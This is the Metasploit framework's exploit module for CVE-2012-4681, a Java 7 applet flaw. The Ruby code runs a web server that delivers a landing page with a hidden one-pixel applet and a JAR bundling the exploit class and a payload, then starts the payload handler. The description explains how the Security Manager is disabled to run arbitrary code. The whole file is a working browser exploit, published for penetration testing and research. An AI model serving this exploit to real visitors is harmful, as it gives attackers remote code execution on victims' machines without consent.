GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
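class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Class files, given as path components, that are copied from the
  # framework data directory into the JAR served to the browser.
  APPLET_CLASS_PATHS = [['Exploit.class']].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java 7 Applet Remote Code Execution',
        'Description' => %q{
          The exploit takes advantage of two issues in JDK 7: The ClassFinder and
          MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a
          replacement for classForName back in JDK 6. It allows untrusted code to obtain a
          reference and have access to a restricted package in JDK 7, which can be used to
          abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can
          actually invoke getField() by abusing findMethod() in Statement.invokeInternal()
          (but getField() must be public, and that's not always the case in JDK 6) in order
          to access Statement.acc's private field, modify AccessControlContext, and then
          disable Security Manager. Once Security Manager is disabled, we can execute
          arbitrary Java code.

          Our exploit has been tested successfully against multiple platforms, including:
          IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory
          'James Forshaw', # Vulnerability discovery according to Oracle's advisory
          'jduck', # metasploit module
          'sinn3r', # metasploit module
          'juan vazquez' # metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-4681' ],
          [ 'OSVDB', '84867' ],
          [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/27/lets-start-the-week-with-a-new-java-0day' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=852051']
        ],
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-08-26',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Entry point for every request the embedded HTTP server hands to this
  # module. Requests whose URI ends in +.jar+ receive the packed applet JAR;
  # every other URI receives the landing page (or a redirect to it).
  #
  # @param cli connected HTTP client, as passed in by the server mixin
  # @param request parsed HTTP request; only +request.uri+ is inspected
  # @return [void]
  def on_request_uri(cli, request)
    if request.uri.match(/\.jar$/i)
      serve_applet_jar(cli)
    else
      serve_landing_page(cli, request)
    end
  end

  # Builds the page that embeds the applet. The +archive+ attribute is a
  # relative reference, which is why the landing page is only served from a
  # URI with a trailing slash (see #serve_landing_page).
  #
  # @return [String] the HTML document
  def generate_html
    '<html><head></head>' \
      '<body>' \
      '<applet archive="Exploit.jar" code="Exploit.class" width="1" height="1">' \
      '</applet></body></html>'
  end

  private

  # Serves the landing page. A URI without a trailing slash is redirected to
  # the resource root first so that the relative JAR reference in the applet
  # tag resolves under this resource.
  #
  # @param cli connected HTTP client
  # @param request parsed HTTP request
  # @return [void]
  def serve_landing_page(cli, request)
    unless request.uri.match(%r{/$})
      send_redirect(cli, get_resource + '/', '')
      return
    end

    print_status("#{name} handling request")
    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
  end

  # Regenerates the payload for this client, packs the applet class into the
  # payload JAR, sends it and starts the payload handler.
  #
  # @param cli connected HTTP client
  # @return [void]
  def serve_applet_jar(cli)
    jar = regenerate_payload(cli).encoded_jar
    APPLET_CLASS_PATHS.each { |path| add_class_file(jar, path) }

    print_status('Sending Applet.jar')
    send_response(cli, jar.pack, { 'Content-Type' => 'application/octet-stream' })

    handler(cli)
  end

  # Adds one class file to +jar+, creating every missing intermediate
  # directory entry first so the archive stays well-formed.
  #
  # @param jar the JAR being assembled (whatever +encoded_jar+ returned)
  # @param path [Array<String>] path components of the class file, relative
  #   to the CVE-2012-4681 data directory
  # @return [void]
  def add_class_file(jar, path)
    (1...path.length).each do |depth|
      dir = path[0, depth].join('/') + '/'
      jar.add_file(dir, '') unless jar.entries.any? { |e| e.name == dir }
    end

    # File.binread closes the descriptor even if the read raises; the previous
    # explicit open/read/close left it open on error.
    data = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2012-4681', path))
    jar.add_file(path.join('/'), data)
  end
end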